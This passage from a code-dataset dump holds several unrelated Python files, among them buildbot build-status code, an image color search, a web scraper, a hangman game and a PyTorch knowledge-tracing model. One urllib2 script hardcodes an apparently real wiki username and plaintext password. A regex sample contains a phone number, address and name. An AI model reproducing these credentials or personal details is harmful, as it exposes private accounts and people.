instances have\n # (empty) values. They are set in __init__ to new objects to make sure\n # each instance gets its own copy.\n watchers = []\n updates = {}\n finishedWatchers = []\n testResults = {}\n\n def __init__(self, parent, number):\n \"\"\"\n @type parent: L{BuilderStatus}\n @type number: int\n \"\"\"\n assert interfaces.IBuilderStatus(parent)\n self.builder = parent\n self.number = number\n self.watchers = []\n self.updates = {}\n self.finishedWatchers = []\n self.steps = []\n self.testResults = {}\n self.properties = Properties()\n\n def __repr__(self):\n return \"<%s #%s>\" % (self.__class__.__name__, self.number)\n\n # IBuildStatus\n\n def getBuilder(self):\n \"\"\"\n @rtype: L{BuilderStatus}\n \"\"\"\n return self.builder\n\n def getProperty(self, propname):\n return self.properties[propname]\n\n def getProperties(self):\n return self.properties\n\n def getNumber(self):\n return self.number\n\n def getPreviousBuild(self):\n if self.number == 0:\n return None\n return self.builder.getBuild(self.number-1)\n\n def getSourceStamp(self, absolute=False):\n if not absolute or not self.properties.has_key('got_revision'):\n return self.source\n return self.source.getAbsoluteSourceStamp(self.properties['got_revision'])\n\n def getReason(self):\n return self.reason\n\n def getChanges(self):\n return self.changes\n\n def getResponsibleUsers(self):\n return self.blamelist\n\n def getInterestedUsers(self):\n # TODO: the Builder should add others: sheriffs, domain-owners\n return self.blamelist + self.properties.getProperty('owners', [])\n\n def getSteps(self):\n \"\"\"Return a list of IBuildStepStatus objects. For invariant builds\n (those which always use the same set of Steps), this should be the\n complete list, however some of the steps may not have started yet\n (step.getTimes()[0] will be None). For variant builds, this may not\n be complete (asking again later may give you more of them).\"\"\"\n return self.steps\n\n def getTimes(self):\n return (self.started, self.finished)\n\n _sentinel = [] # used as a sentinel to indicate unspecified initial_value\n def getSummaryStatistic(self, name, summary_fn, initial_value=_sentinel):\n \"\"\"Summarize the named statistic over all steps in which it\n exists, using combination_fn and initial_value to combine multiple\n results into a single result. 
This translates to a call to Python's\n        X{reduce}::\n          return reduce(summary_fn, step_stats_list, initial_value)\n        \"\"\"\n        step_stats_list = [\n                st.getStatistic(name)\n                for st in self.steps\n                if st.hasStatistic(name) ]\n        if initial_value is self._sentinel:\n            return reduce(summary_fn, step_stats_list)\n        else:\n            return reduce(summary_fn, step_stats_list, initial_value)\n\n    def isFinished(self):\n        return (self.finished is not None)\n\n    def waitUntilFinished(self):\n        if self.finished:\n            d = defer.succeed(self)\n        else:\n            d = defer.Deferred()\n            self.finishedWatchers.append(d)\n        return d\n\n    # while the build is running, the following methods make sense.\n    # Afterwards they return None\n\n    def getETA(self):\n        if self.finished is not None:\n            return None\n        if not self.progress:\n            return None\n        eta = self.progress.eta()\n        if eta is None:\n            return None\n        return eta - util.now()\n\n    def getCurrentStep(self):\n        return self.currentStep\n\n    # Once you know the build has finished, the following methods are legal.\n    # Before the build has finished, they all return None.\n\n    def getText(self):\n        text = []\n        text.extend(self.text)\n        for s in self.steps:\n            text.extend(s.text2)\n        return text\n\n    def getResults(self):\n        return self.results\n\n    def getSlavename(self):\n        return self.slavename\n\n    def getTestResults(self):\n        return self.testResults\n\n    def getTestResultsOrd(self):\n        trs = self.testResults.keys()\n        trs.sort()\n        ret = [ self.testResults[t] for t in trs]\n        return ret\n\n    def getLogs(self):\n        # TODO: steps should contribute significant logs instead of this\n        # hack, which returns every log from every step. The logs should get\n        # names like \"compile\" and \"test\" instead of \"compile.output\"\n        logs = []\n        for s in self.steps:\n            for loog in s.getLogs():\n                logs.append(loog)\n        return logs\n\n    # subscription interface\n\n    def subscribe(self, receiver, updateInterval=None):\n        # will receive stepStarted and stepFinished messages\n        # and maybe buildETAUpdate\n        self.watchers.append(receiver)\n        if updateInterval is not None:\n            self.sendETAUpdate(receiver, updateInterval)\n\n    def sendETAUpdate(self, receiver, updateInterval):\n        self.updates[receiver] = None\n        ETA = self.getETA()\n        if ETA is not None:\n            receiver.buildETAUpdate(self, self.getETA())\n        # they might have unsubscribed during buildETAUpdate\n        if receiver in self.watchers:\n            self.updates[receiver] = reactor.callLater(updateInterval,\n                                                       self.sendETAUpdate,\n                                                       receiver,\n                                                       updateInterval)\n\n    def unsubscribe(self, receiver):\n        if receiver in self.watchers:\n            self.watchers.remove(receiver)\n        if receiver in self.updates:\n            if self.updates[receiver] is not None:\n                self.updates[receiver].cancel()\n            del self.updates[receiver]\n\n    # methods for the base.Build to invoke\n\n    def addStepWithName(self, name):\n        \"\"\"The Build is setting up, and has added a new BuildStep to its\n        list. 
Create a BuildStepStatus object to which it can send status\n updates.\"\"\"\n\n s = BuildStepStatus(self, len(self.steps))\n s.setName(name)\n self.steps.append(s)\n return s\n\n def setProperty(self, propname, value, source, runtime=True):\n self.properties.setProperty(propname, value, source, runtime)\n\n def addTestResult(self, result):\n self.testResults[result.getName()] = result\n\n def setSourceStamp(self, sourceStamp):\n self.source = sourceStamp\n self.changes = self.source.changes\n\n def setReason(self, reason):\n self.reason = reason\n def setBlamelist(self, blamelist):\n self.blamelist = blamelist\n def setProgress(self, progress):\n self.progress = progress\n\n def buildStarted(self, build):\n \"\"\"The Build has been set up and is about to be started. It can now\n be safely queried, so it is time to announce the new build.\"\"\"\n\n self.started = util.now()\n # now that we're ready to report status, let the BuilderStatus tell\n # the world about us\n self.builder.buildStarted(self)\n\n def setSlavename(self, slavename):\n self.slavename = slavename\n\n def setText(self, text):\n assert isinstance(text, (list, tuple))\n self.text = text\n def setResults(self, results):\n self.results = results\n\n def buildFinished(self):\n self.currentStep = None\n self.finished = util.now()\n\n for r in self.updates.keys():\n if self.updates[r] is not None:\n self.updates[r].cancel()\n del self.updates[r]\n\n watchers = self.finishedWatchers\n self.finishedWatchers = []\n for w in watchers:\n w.callback(self)\n\n # methods called by our BuildStepStatus children\n\n def stepStarted(self, step):\n self.currentStep = step\n for w in self.watchers:\n receiver = w.stepStarted(self, step)\n if receiver:\n if type(receiver) == type(()):\n step.subscribe(receiver[0], receiver[1])\n else:\n step.subscribe(receiver)\n d = step.waitUntilFinished()\n d.addCallback(lambda step: step.unsubscribe(receiver))\n\n step.waitUntilFinished().addCallback(self._stepFinished)\n\n def _stepFinished(self, step):\n results = step.getResults()\n for w in self.watchers:\n w.stepFinished(self, step, results)\n\n # methods called by our BuilderStatus parent\n\n def pruneSteps(self):\n # this build is very old: remove the build steps too\n self.steps = []\n\n # persistence stuff\n\n def generateLogfileName(self, stepname, logname):\n \"\"\"Return a filename (relative to the Builder's base directory) where\n the logfile's contents can be stored uniquely.\n\n The base filename is made by combining our build number, the Step's\n name, and the log's name, then removing unsuitable characters. The\n filename is then made unique by appending _0, _1, etc, until it does\n not collide with any other logfile.\n\n These files are kept in the Builder's basedir (rather than a\n per-Build subdirectory) because that makes cleanup easier: cron and\n find will help get rid of the old logs, but the empty directories are\n more of a hassle to remove.\"\"\"\n\n starting_filename = \"%d-log-%s-%s\" % (self.number, stepname, logname)\n starting_filename = re.sub(r'[^\\w\\.\\-]', '_', starting_filename)\n # now make it unique\n unique_counter = 0\n filename = starting_filename\n while filename in [l.filename\n for step in self.steps\n for l in step.getLogs()\n if l.filename]:\n filename = \"%s_%d\" % (starting_filename, unique_counter)\n unique_counter += 1\n return filename\n\n def __getstate__(self):\n d = styles.Versioned.__getstate__(self)\n # for now, a serialized Build is always \"finished\". 
We will never\n # save unfinished builds.\n if not self.finished:\n d['finished'] = util.now()\n # TODO: push an \"interrupted\" step so it is clear that the build\n # was interrupted. The builder will have a 'shutdown' event, but\n # someone looking at just this build will be confused as to why\n # the last log is truncated.\n for k in 'builder', 'watchers', 'updates', 'finishedWatchers':\n if k in d: del d[k]\n return d\n\n def __setstate__(self, d):\n styles.Versioned.__setstate__(self, d)\n # self.builder must be filled in by our parent when loading\n for step in self.steps:\n step.build = weakref.ref(self)\n self.watchers = []\n self.updates = {}\n self.finishedWatchers = []\n\n def upgradeToVersion1(self):\n if hasattr(self, \"sourceStamp\"):\n # the old .sourceStamp attribute wasn't actually very useful\n maxChangeNumber, patch = self.sourceStamp\n changes = getattr(self, 'changes', [])\n source = sourcestamp.SourceStamp(branch=None,\n revision=None,\n patch=patch,\n changes=changes)\n self.source = source\n self.changes = source.changes\n del self.sourceStamp\n self.wasUpgraded = True\n\n def upgradeToVersion2(self):\n self.properties = {}\n self.wasUpgraded = True\n\n def upgradeToVersion3(self):\n # in version 3, self.properties became a Properties object\n propdict = self.properties\n self.properties = Properties()\n self.properties.update(propdict, \"Upgrade from previous version\")\n self.wasUpgraded = True\n\n def upgradeLogfiles(self):\n # upgrade any LogFiles that need it. This must occur after we've been\n # attached to our Builder, and after we know about all LogFiles of\n # all Steps (to get the filenames right).\n assert self.builder\n for s in self.steps:\n for l in s.getLogs():\n if l.filename:\n pass # new-style, log contents are on disk\n else:\n logfilename = self.generateLogfileName(s.name, l.name)\n # let the logfile update its .filename pointer,\n # transferring its contents onto disk if necessary\n l.upgrade(logfilename)\n\n def checkLogfiles(self):\n # check that all logfiles exist, and remove references to any that\n # have been deleted (e.g., by purge())\n for s in self.steps:\n s.checkLogfiles()\n\n def saveYourself(self):\n filename = os.path.join(self.builder.basedir, \"%d\" % self.number)\n if os.path.isdir(filename):\n # leftover from 0.5.0, which stored builds in directories\n shutil.rmtree(filename, ignore_errors=True)\n tmpfilename = filename + \".tmp\"\n try:\n dump(self, open(tmpfilename, \"wb\"), -1)\n if runtime.platformType == 'win32':\n # windows cannot rename a file on top of an existing one, so\n # fall back to delete-first. 
There are ways this can fail and\n # lose the builder's history, so we avoid using it in the\n # general (non-windows) case\n if os.path.exists(filename):\n os.unlink(filename)\n os.rename(tmpfilename, filename)\n except:\n log.msg(\"unable to save build %s-#%d\" % (self.builder.name,\n self.number))\n log.err()\n\n def asDict(self):\n result = {}\n # Constant\n result['builderName'] = self.builder.name\n result['number'] = self.getNumber()\n result['sourceStamp'] = self.getSourceStamp().asDict()\n result['reason'] = self.getReason()\n result['blame'] = self.getResponsibleUsers()\n\n # Transient\n result['properties'] = self.getProperties().asList()\n result['times'] = self.getTimes()\n result['text'] = self.getText()\n result['results'] = self.getResults()\n result['slave'] = self.getSlavename()\n # TODO(maruel): Add.\n #result['test_results'] = self.getTestResults()\n result['logs'] = [[l.getName(),\n self.builder.status.getURLForThing(l)] for l in self.getLogs()]\n result['eta'] = self.getETA()\n result['steps'] = [bss.asDict() for bss in self.steps]\n if self.getCurrentStep():\n result['currentStep'] = self.getCurrentStep().asDict()\n else:\n result['currentStep'] = None\n return result\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/third_party/buildbot_8_4p1/buildbot/status/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":15841,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"16480671668","text":"from networkapi.wagtailpages import utils\n\n\nclass FoundationNavigationPageMixin:\n def get_context(self, request):\n context = super().get_context(request)\n context = utils.set_main_site_nav_information(self, context, \"Homepage\")\n return context\n\n class Meta:\n abstract = True\n","repo_name":"MozillaFoundation/foundation.mozilla.org","sub_path":"network-api/networkapi/wagtailpages/pagemodels/mixin/foundation_navigation.py","file_name":"foundation_navigation.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":344,"dataset":"github-code","pt":"72"} +{"seq_id":"16066360561","text":"import numpy as np\nimport cv2\nimg=cv2.imread('img3.png',1)\n#img= np.array([[[1, 2, 3],[4, 5, 6],[7, 8, 9]],[[2, 3, 4],[1, 3, 5],[6, 5, 7]]])\n#row=0\n#col=0\nfound=0\ncord = []\ncolor=[[0,0,255],[0,255,0]]\nfor k in color:\n\tcol=0\n\trow=0\n\tfor i in img:\n\t\trow+=1\n\t\t#col=0\n\t\tfor j in i:\n\t\t\tcol+=1\n\t\t\tif np.array_equal(j,k): #BGR value is given\n\t\t\t\t#print(row,col)\n\t\t\t\tprint('coordinates x,y for {} is {},{}'.format(k,col-1,row-1))\n\t\t\t\tcord.append((col-1,row-1))\t\n\t\t\t\tfound+=1\n\t\t\t\t#col=0\n\t\t\t\t#break\n\t\t\telif col==1024: #col==last db_column=''\n\t\t\t\tcol=0\n\t\t#if found:break\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\nif not found:print('not found')\nprint(cord)\nprint('total {} coordinates are 
found'.format(found))\n","repo_name":"tarunesh1234/opencv-tests","sub_path":"xycolor.py","file_name":"xycolor.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20837341684","text":"\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom metallum_scraper import request\nimport re\n\n\nclass Scraper:\n\n def get_band_details(self,url):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n categories = ['band_id', 'Name', 'Country of Origin', 'Location', 'Status', 'Year Formed', 'Genre',\n 'Lyrical Themes',\n 'Current Label', 'Years Active', 'datetime_added', 'datetime_modified']\n band_page = request.get_raw(url)\n\n soup = BeautifulSoup(band_page, 'html.parser')\n\n band_id = re.sub(\"\\n\", \"\", url[url.rindex(\"/\") + 1:])\n band_name = soup.find(\"h1\", {\"class\": \"band_name\"}).text\n ret_band = [band_id, band_name]\n div_band_stats = soup.find(\"div\", {\"id\": \"band_stats\"})\n\n stats_values = [\" \".join(a.text.strip().split()) for a in div_band_stats.find_all(\"dd\")]\n ret_band.extend(stats_values)\n ret_band.extend([now, now]) # create date, update date\n\n r_dict = dict(zip(categories, ret_band))\n\n return r_dict","repo_name":"Evans88/metallum_scraper","sub_path":"metallum_scraper/scrape/Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17932397329","text":"\"\"\"Code under test example\n\nThis module contains slightly modified version of example production code used to demonstrate\nwriting test when requirements change.\n\"\"\"\n\n\ndef modified_personalize_menu(menu, user):\n if user['is_allergic']: # key name changed\n return [dish for dish in menu if not dish.get('allergens')]\n\n return menu\n\n\n# example call\n\nmenu = [\n {'name': 'apple', 'allergens': []},\n {'name': 'chocolate cake', 'allergens': ['eggs', 'gluten', 'milk']},\n {'name': 'tomato soup', 'allergens': []},\n {'name': 'lasagne', 'allergens': ['eggs', 'milk']}\n]\n\nusers = [\n {'username': 'marvin', 'is_allergic': True},\n {'username': 'trillian', 'is_allergic': False}\n]\n\nfiltered_menu = modified_personalize_menu(menu, users[0])\nprint(filtered_menu)\n\nfiltered_menu = modified_personalize_menu(menu, users[1])\nprint(filtered_menu)\n","repo_name":"inesjelovac/demo-testing-best-practices","sub_path":"production_code/code_under_test_with_change_in_logic.py","file_name":"code_under_test_with_change_in_logic.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17270092426","text":"#coding=utf-8\nimport urllib\nimport urllib2\nimport cookielib\nimport zlib\n\nfilename = 'cookie.txt'\n#cookie = cookielib.CookieJar()\ncookie = cookielib.MozillaCookieJar(filename)\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\n\npostdata = urllib.urlencode({\n 'os_username':'houkl',\n 'os_password':'0624houkailong',\n 'login':'登陆',\n 'os_destination':'/index.action'\n})\nreq = urllib2.Request(\n url = 'http://wiki.haodaibao.com/dologin.action',\n data = postdata\n)\nresult = opener.open(req)\ncookie.save(ignore_discard=True,ignore_expires=True)\ngradeUrl = 'http://wiki.haodaibao.com/pages/viewpage.action?pageId=2523729'\nresult = opener.open(gradeUrl)\nwith file('zichan.txt','wb') as code:\n code.write(result.read())\n 
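# close the HTTP response once its body has been written to disk\n    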
result.close()\n\n","repo_name":"houkailong/py-project","sub_path":"test/get3.py","file_name":"get3.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27653486955","text":"import funcoes\n\nfuncoes.limpaTela()\n\nprint(\"JOGO DA FORCA\\n\")\nprint(\"Alunos: Marco Antonio Flores da Silva e Pedro Luan Rodrigues\\n\")\n\nwhile True:\n    desafiante = input(\"Desafiante: \")\n    competidor = input(\"Competidor: \")\n    funcoes.jogadores(desafiante, competidor)\n\n    funcoes.limpaTela()\n\n    palavraChave = input(\"Digite a palavra chave: \")\n    respostasDicas = [\"1ª Dica: \", \"2ª Dica: \", \"3ª Dica: \"]\n    dicas = []\n    for i in range (len(respostasDicas)):\n        print(respostasDicas[i])\n        dicas.append(input())\n    \n    funcoes.limpaTela()\n    \n    print(\"A palavra é composta por\", len(palavraChave), \"letras.\")\n    for i in range (len(palavraChave)):\n        print(\"*\", end = \"\")  # um espaço reservado por letra\n    print()\n    \n    erros = 0\n    tentativas = []\n    acertos= []\n    vencedor = []\n\n    while True:\n        print(\"\\n\")\n        print(\"(1) Jogar\")\n        print(\"(2) Solicitar dica (\",len(dicas),\"disponíveis).\")\n        print(\"Erro: \" , erros)\n        \n        opcao = input()\n        if opcao == \"1\":\n            letra = input(\"Digite uma letra: \")\n            if letra in tentativas:\n                print(\"Você já tentou essa letra anteriormente.\")\n            elif letra not in palavraChave:\n                print(\"Essa letra não pertence a palavra.\")\n                tentativas.append(letra)\n                erros += 1 \n            else:\n                print(\"Você acertou uma letra!\")\n                acertos.append(letra)\n                palavra = \"\"\n                for letra in palavraChave:\n                    if letra in acertos:\n                        palavra += letra\n                    else:\n                        palavra += \"*\"\n                print(palavra)\n                if palavra == palavraChave:\n                    print(\"Parabéns! Você acertou!\")\n                    vencedor = competidor\n                    break\n        elif opcao == \"2\":\n            try:\n                print(dicas[0])\n                del dicas[0]\n            except:\n                print(\"Suas dicas acabaram!\")\n        else:\n            print(\"Opção inválida!\")\n        \n        if erros >= 5:\n            print(\"Que pena! 
Você perdeu!\")\n break\n \n funcoes.relatorio(desafiante, competidor, palavraChave, vencedor)\n texto = funcoes.verRelatorio()\n for i in texto:\n texto = i.strip('\\n')\n print(texto)\n\n print(\"\\n(1) Sair.\")\n print(\"(2) Jogar novamente.\")\n opcao2 = input()\n if opcao2 == \"1\":\n break\n elif opcao2 == \"2\":\n pass\n else:\n print(\"Opção inválida!\")","repo_name":"maarcoafs/Jogo-da-Forca","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15945786502","text":"import re\nReDan = \"13502377825 =帝景湾维也纳北二门13号1003= 一个6斤左右熟的金枕榴莲(开肉送 拍视频) 20元百香果 转账 莉莉\"\nDingDan = \"\"\nXiaDan = \"\"\nCaoRe = \"\"\n\n#正则表达式预处理\n#预处理电话号码\nSubPa= re.compile(\"(?<=\\d{3})[ -]|\\s\")\n#预处理收款方式\nGcash = re.compile(r\"现金|收现转账都可以\")\nGvip = re.compile(r\"会员消费|电子卡消费\")\nGtran = re.compile(r\"转帐|已转账|已收现\")\nGmon = re.compile(r\"月底结算\")\n#获取电话号码\nPhone = re.compile(r\"[01]\\d{10}[/]?(?<=[/])\\d*|[01]\\d{10}|(?=3.4',\n install_requires=['bluepy>=1.0.5'],\n description='Library for reading temperature, humidity, and battery level from a '\n 'SHT31 Smart Gadget Development Kit by Sensirion',\n long_description=include_readme(),\n author='Matthias Erll',\n author_email='matthias@erll.de',\n url='https://github.com/merll/python-smartgadget',\n license=\"MIT\",\n)\n","repo_name":"merll/python-smartgadget","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72229420393","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport numpy as np\nimport os\nimport math\n\ntry:\n from transformers.modeling_bert import BertConfig, BertEncoder, BertModel \nexcept:\n from transformers.models.bert.modeling_bert import BertConfig, BertEncoder, BertModel \n\nclass Feed_Forward_block(nn.Module):\n def __init__(self, dim_ff):\n super().__init__()\n self.layer1 = nn.Linear(in_features=dim_ff , out_features=dim_ff)\n self.layer2 = nn.Linear(in_features=dim_ff , out_features=dim_ff)\n\n def forward(self,ffn_in):\n return self.layer2( F.relu( self.layer1(ffn_in) ) )\n\n\nclass Mymodel(nn.Module):\n\n def __init__(self, args):\n super(Mymodel, self).__init__()\n self.args = args\n self.device = args.device\n\n # Defining some parameters\n self.hidden_dim = self.args.hidden_dim\n self.n_layers = self.args.n_layers\n\n # Embedding \n # interaction은 현재 correct으로 구성되어있다. 
correct(1, 2) + padding(0)\n # n_test, n_questions, n_tag : 유니크한 개수??\n \n self.embed_dim = 128\n\n self.embedding_interaction = nn.Embedding(3, self.embed_dim)\n self.embedding_test = nn.Embedding(self.args.n_test + 1, self.embed_dim)\n self.embedding_question = nn.Embedding(self.args.n_questions + 1, self.embed_dim)\n self.embedding_tag = nn.Embedding(self.args.n_tag + 1, self.embed_dim)\n\n # 추가 feature\n self.embedding_userID_elapsed_cate = nn.Embedding(self.args.n_userID_elapsed_cate + 1, self.embed_dim)\n self.embedding_question_class = nn.Embedding(self.args.n_question_class + 1, self.embed_dim)\n self.embedding_userID_assessmentItemID_experience = nn.Embedding(self.args.n_userID_assessmentItemID_experience + 1, self.embed_dim)\n\n self.drop_out = nn.Dropout(self.args.drop_out)\n\n # embedding combination projection\n self.question_cate= nn.Linear(self.embed_dim*5, self.hidden_dim // 2)\n self.question_cont = nn.Linear(2, self.hidden_dim // 2)\n self.user_cate= nn.Linear(self.embed_dim*2, self.hidden_dim // 2)\n self.user_cont = nn.Linear(5, self.hidden_dim // 2)\n self.prelu1_question = nn.PReLU()\n self.prelu1_user = nn.PReLU()\n\n self.attention_layer = nn.MultiheadAttention(embed_dim= self.hidden_dim, num_heads= 8, dropout=self.args.drop_out)\n self.ff_layer = Feed_Forward_block(self.hidden_dim)\n self.prelu2_attention = nn.PReLU()\n\n\n self.question_layer_norm = nn.LayerNorm(self.hidden_dim)\n self.user_layer_norm = nn.LayerNorm(self.hidden_dim)\n self.layer_norm = nn.LayerNorm(self.hidden_dim)\n\n self.conv1d_layer1 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=1)\n self.prelu3_conv1 = nn.PReLU()\n self.conv1d_layer2 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=2)\n self.prelu3_conv2 = nn.PReLU()\n self.conv1d_layer3 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=3)\n self.prelu3_conv3 = nn.PReLU()\n self.conv1d_layer4 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=4)\n self.prelu3_conv4 = nn.PReLU()\n self.conv1d_layer5 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=5)\n self.prelu3_conv5 = nn.PReLU()\n self.conv1d_layer6 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=6)\n self.prelu3_conv6 = nn.PReLU()\n self.conv1d_layer7 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=7)\n self.prelu3_conv7 = nn.PReLU()\n self.conv1d_layer8 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=8)\n self.prelu3_conv8 = nn.PReLU()\n self.conv1d_layer9 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=9)\n self.prelu3_conv9 = nn.PReLU()\n self.conv1d_layer10 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=10)\n self.prelu3_conv10 = nn.PReLU()\n\n\n self.lstm = nn.LSTM(input_size= self.hidden_dim, hidden_size= self.hidden_dim, num_layers=1)\n self.fc = nn.Linear(self.hidden_dim , 1)\n self.activation = nn.Sigmoid()\n\n\n def forward(self, input):\n os.environ[\"CUDA_LAUNCH_BLOCKING\"] = \"1\"\n #test, question, tag, _, mask, interaction, _ = input\n test, question, tag, _, userID_elapsed_cate, IK_question_acc, question_class, IK_KnowledgeTag_acc, userID_acc, userID_assessmentItemID_experience, user_question_class_solved, solved_question, userID_KnowledgeTag_total_answer, userID_KnowledgeTag_acc, userID_acc_rolling, mask, interaction, _ = input\n batch_size = interaction.size(0)\n\n # 신나는 embedding\n embed_interaction = self.embedding_interaction(interaction)\n embed_test = self.embedding_test(test)\n embed_question = self.embedding_question(question)\n embed_tag = self.embedding_tag(tag) \n\n 
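# embeddings for the engineered categorical features: elapsed-time bucket,\n        # question class, and prior exposure to the same assessment item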
\n embed_userID_elapsed_cate = self.embedding_userID_elapsed_cate(userID_elapsed_cate)\n embed_question_class = self.embedding_question_class(question_class)\n embed_userID_assessmentItemID_experience = self.embedding_userID_assessmentItemID_experience(userID_assessmentItemID_experience)\n\n question_cate = torch.cat([embed_interaction,\n embed_test,\n embed_question,\n embed_tag,\n embed_question_class\n ], 2)\n\n question_cont = torch.cat([IK_question_acc.unsqueeze(-1),\n IK_KnowledgeTag_acc.unsqueeze(-1),\n ], 2)\n\n user_cate = torch.cat([\n embed_userID_elapsed_cate,\n embed_userID_assessmentItemID_experience,\n ], 2)\n\n user_cont = torch.cat([\n userID_acc.unsqueeze(-1),\n user_question_class_solved.unsqueeze(-1),\n solved_question.unsqueeze(-1),\n userID_KnowledgeTag_total_answer.unsqueeze(-1),\n userID_KnowledgeTag_acc.unsqueeze(-1),\n ], 2)\n\n question_cate_embed = self.question_cate(question_cate)\n question_cont_embed = self.question_cont(question_cont)\n\n user_cate_embed = self.user_cate(user_cate)\n user_cont_embed = self.user_cont(user_cont)\n\n question_embed = self.drop_out((torch.cat([question_cate_embed, question_cont_embed], 2)))\n user_embed = self.drop_out((torch.cat([user_cate_embed, user_cont_embed], 2)))\n\n question_embed = self.question_layer_norm(question_embed)\n user_embed = self.question_layer_norm(user_embed)\n\n question_embed = self.prelu1_question(question_embed)\n user_embed = self.prelu1_user(user_embed)\n\n out, attn_wt = self.attention_layer(question_embed , user_embed , user_embed)\n out = self.ff_layer(out)\n out = self.prelu2_attention(out)\n\n out = out + user_embed + question_embed\n\n conv_output1 = self.prelu3_conv1(self.conv1d_layer1(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output2 = self.prelu3_conv2(self.conv1d_layer2(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output3 = self.prelu3_conv3(self.conv1d_layer3(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output4 = self.prelu3_conv4(self.conv1d_layer4(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output5 = self.prelu3_conv5(self.conv1d_layer5(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output6 = self.prelu3_conv6(self.conv1d_layer6(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output7 = self.prelu3_conv7(self.conv1d_layer7(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output8 = self.prelu3_conv8(self.conv1d_layer8(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output9 = self.prelu3_conv9(self.conv1d_layer9(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output10 = self.prelu3_conv10(self.conv1d_layer10(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n\n out = conv_output1[:,:,9:] + conv_output2[:,:,8:] + conv_output3[:,:,7:] + conv_output4[:,:,6:] + conv_output5[:,:,5:] + conv_output6[:,:,4:] + conv_output7[:,:,3:] + conv_output8[:,:,2:] + conv_output9[:,:,1:] + conv_output10\n out = out.transpose(1, 2)\n out = out + user_embed[:,9:,:] + question_embed[:,9:,:]\n\n #out = self.drop_out(out)\n #out, _ = self.lstm(out)?\n\n out = self.drop_out(out)\n\n out = self.fc(out)\n preds = self.activation(out).view(batch_size, -1)\n\n return preds","repo_name":"bcaitech1/p4-dkt-team-ikyo","sub_path":"code/Deep 
